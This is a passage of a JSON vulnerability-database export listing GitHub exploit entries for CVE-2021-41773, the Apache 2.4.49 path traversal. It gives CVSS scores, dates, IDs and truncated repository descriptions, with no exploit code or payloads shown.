"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-26T16:48:57", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-08-10T09:07:10", "id": "FDF4BBB1-979C-5320-95EA-9EC7EB064D72", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n<p align=\"center\">\n<img width=\"927\" alt=\"top\" s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-12T00:51:32", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-18T15:37:03", "id": "4B44115D-85A3-5E62-B9A8-5F336C24673F", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-19T20:31:26", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-14T04:08:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-14T04:09:11", "id": "0AA6A425-25B1-5D2A-ABA1-2933D3E1DC56", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\nPath Traversal for Apache 2.4.49\n\n## Affected b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T21:37:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-20T23:04:09", "id": "E6B39247-8016-5007-B505-699F05FCA1B5", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 - Apache HTTP Server 2.4.49\n\n# Cara Menjalankan...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-20T14:41:15", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-23T13:15:51", "id": "C0380E16-C468-5540-A427-7FE34E7CF36B", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:31:08", "description": "# CVE-2021-41773\n### Poc CVE-2021-41773 - Apache 2.4.49 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-23T21:37:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-23T23:15:50", "id": "C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:31:15", "description": "# Apache 2.4.49 - Path Traversal or Remote Code Execution\ncve-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-23T12:31:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-11-25T09:32:45", "id": "3CF66144-235E-5F7A-B889-113C11ABF150", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-11-09T18:33:16", "description": "# mass_cve-2021-41773\n***MASS CVE-2021-41773***\n## Screenshot\n<i...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T15:13:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-11-09T18:13:59", "id": "68E78C64-D93A-5E8B-9DEA-4A8D826B474E", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# Scanner-CVE-2021-41773\n### A automatic scanner to apache 2.4.4...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-25T21:34:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-25T22:17:23", "id": "5A54F5DA-F9C1-508B-AD2D-3E45CD647D31", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 scanner\n### This script tests for the path t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-08T08:32:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:53:24", "id": "E9FE319B-26BF-5A75-8C6A-8AE55D7E7615", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n\nHello guys, yesterday The new CVE-2021-41773 f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T12:30:13", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:36:13", "id": "A6753173-D2DC-54CC-A5C4-0751E61F0343", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-28T22:26:15", "description": "# CVE-2021-41773\nThis is my first time trying to make an explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-08T04:26:31", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-02-28T17:17:24", "id": "37A9128D-17C4-50FF-B025-5FC3E0F3F338", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-11T07:46:42", "description": "CVE-2021-41773 Playground\n===\n\nThis is a small Docker recipe for...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T07:17:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-08-11T03:05:15", "id": "C068A003-5258-51DC-A3C0-786638A1B69C", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 \r\nPath Traversal in Apache HTTP Server 2.4.49\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T16:19:45", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-08T01:15:42", "id": "628A345B-5FD8-5A2F-8782-9125584E4C89", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:03:28", "description": "# cve-2021-41773\nCVE-2021-41773 Path Traversal vulnerability in ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T16:13:38", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-23T16:50:30", "id": "6C0C909F-3307-5755-97D2-0EBD17367154", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "CVE-2021-41773 Playground\n===\n\nThis is a small Docker recipe for...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T00:14:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-11-01T09:04:40", "id": "04E3583E-DFED-5D0D-BCF2-1C1230EB666D", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-06-25T10:34:43", "description": "# ScaRCE Framework - CVE-2021-41773 Hunter\n[\n## \n\n[![N|Sol...", "cvss3": {}, "published": "2021-10-06T05:22:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T05:24:35", "id": "B8198D62-F9C8-5E03-A301-9A3580070B4C", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773-nse\n# By George Labrin (@creadpag)\n## \n\n[![N|So...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T05:34:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-11-15T12:00:37", "id": "ECD5D758-774C-5488-B782-C8996208B401", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 (Apache httpd only 2.4.49)\n\nFor educational pur...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T18:56:04", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:37:45", "id": "3AE03E90-26EC-5F91-B84E-F04AF6239A9F", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-15T07:45:21", "description": "# CVE-2021-41773\nExploitation of CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T20:30:01", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-15T07:22:07", "id": "6E104766-2F7A-5A0A-A24B-61D9B52AD4EE", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-12T14:47:39", "description": "# CVE-2021-41773\nCVE-2021-41773 POC with Docker\n\n### Configurati...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T02:30:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": 